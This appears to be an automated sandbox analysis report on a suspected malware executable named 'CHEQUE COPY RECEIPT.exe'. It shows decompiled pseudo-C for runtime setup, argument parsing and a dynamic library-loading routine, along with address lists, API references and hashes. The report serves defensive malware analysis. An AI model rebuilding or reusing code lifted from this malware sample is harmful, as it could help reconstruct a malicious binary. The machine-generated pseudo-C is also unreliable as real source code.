						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x761c54
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

0x00402e86
0x00402eb4
0x00402eba
0x00402ec0
0x00402ec8
0x00402ecf
0x00402ecf
0x00402ed4
0x00402edb
0x00402ee2
0x00402ef4
0x00402efb
0x00402f1a
0x00402f26
0x00402f41
0x00402f44
0x00402f4b
0x00402f51
0x00402f58
0x00402f5b
0x00402f5d
0x00402f61
0x00402f6b
0x00402f6b
0x00402f6d
0x00402f73
0x00402f76
0x00402f78
0x00402f7e
0x00402f7f
0x00402f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f63
0x00402f63
0x00402f63
0x00402f66
0x00402f67
0x00000000
0x00402f63
0x00402f53
0x00000000
0x00402f53
0x00402f2c
0x00402f31
0x00402f33
0x00402f35
0x00000000
0x00402efd
0x00402efd
0x00402f02
0x00402f04
0x00402f05
0x00402f3a
0x00402f3a
0x00402f88
0x00402f89
0x00000000
0x00402f92
0x00402e8e
0x00402e8e
0x00402e95
0x00402e96
0x00402e98
0x00000000
0x00402e9d

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,00000104), ref: 00402EB4

Strings

@Ev, xrefs: 00402F35, 00402F78
C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe, xrefs: 00402EAB, 00402EB2, 00402EE1, 00402F19

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleName
String ID: @Ev$C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
API String ID: 514040917-2395638170
Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 5364 Parent PID: 904 CHEQUE COPY RECEIPT.exeCOMMON

Executed Functions

Function 73351A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73351A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73351215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73351215();
				_t320 = E7335123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E733512FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73351534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73352259) & 0x000000ff) * 4 +  &M733521CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73351224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73351215();
											 &_v12 = E73351A36( &_v12);
											__eax = E73351429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73351A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73351A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7335305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73351A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E733515C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E733512FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E733515C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E733512FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E733512FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E733512FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73351224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E733512FE(_t90) * 4);
					goto L165;
				}
			}

0x73351aa0
0x73351aa3
0x73351aa6
0x73351aa9
0x73351aac
0x73351aaf
0x73351ab2
0x73351ab4
0x73351ab7
0x73351aba
0x73351abf
0x73351ac2
0x73351aca
0x73351ad2
0x73351ad4
0x73351ad7
0x73351adf
0x73351adf
0x73351ae4
0x73351ae7
0x00000000
0x00000000
0x73351af1
0x73351af3
0x73351af8
0x73351afa
0x73351b8b
0x73351b8b
0x73351b8b
0x73351b8f
0x73351b92
0x73351b94
0x73351bb6
0x73351bb9
0x73351bbb
0x73351bc4
0x73351bca
0x73351bcc
0x73351bd2
0x73351bd2
0x73351bd8
0x73351bdb
0x73351bdb
0x73351bde
0x73351bde
0x73351be4
0x73351be6
0x73351be9
0x73351bef
0x73351bf2
0x73351bf2
0x73351bf4
0x73351bfa
0x73351bfd
0x73351c21
0x73351c24
0x00000000
0x00000000
0x73351c27
0x73351c29
0x73351c37
0x73351c3a
0x73351c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x73351c3e
0x73351c3e
0x73351c3e
0x73351c44
0x73351c46
0x00000000
0x00000000
0x73351c48
0x73351c4a
0x73351c4c
0x73351c4e
0x00000000
0x00000000
0x00000000
0x73351c4e
0x73351c50
0x73351c52
0x73351c54
0x73351c54
0x73351c5a
0x73351c60
0x73351c62
0x73351c76
0x73351c76
0x73351c78
0x73351c64
0x73351c6a
0x73351c6d
0x73351c6d
0x00000000
0x73351bff
0x73351bff
0x73351bff
0x73351c00
0x73351c08
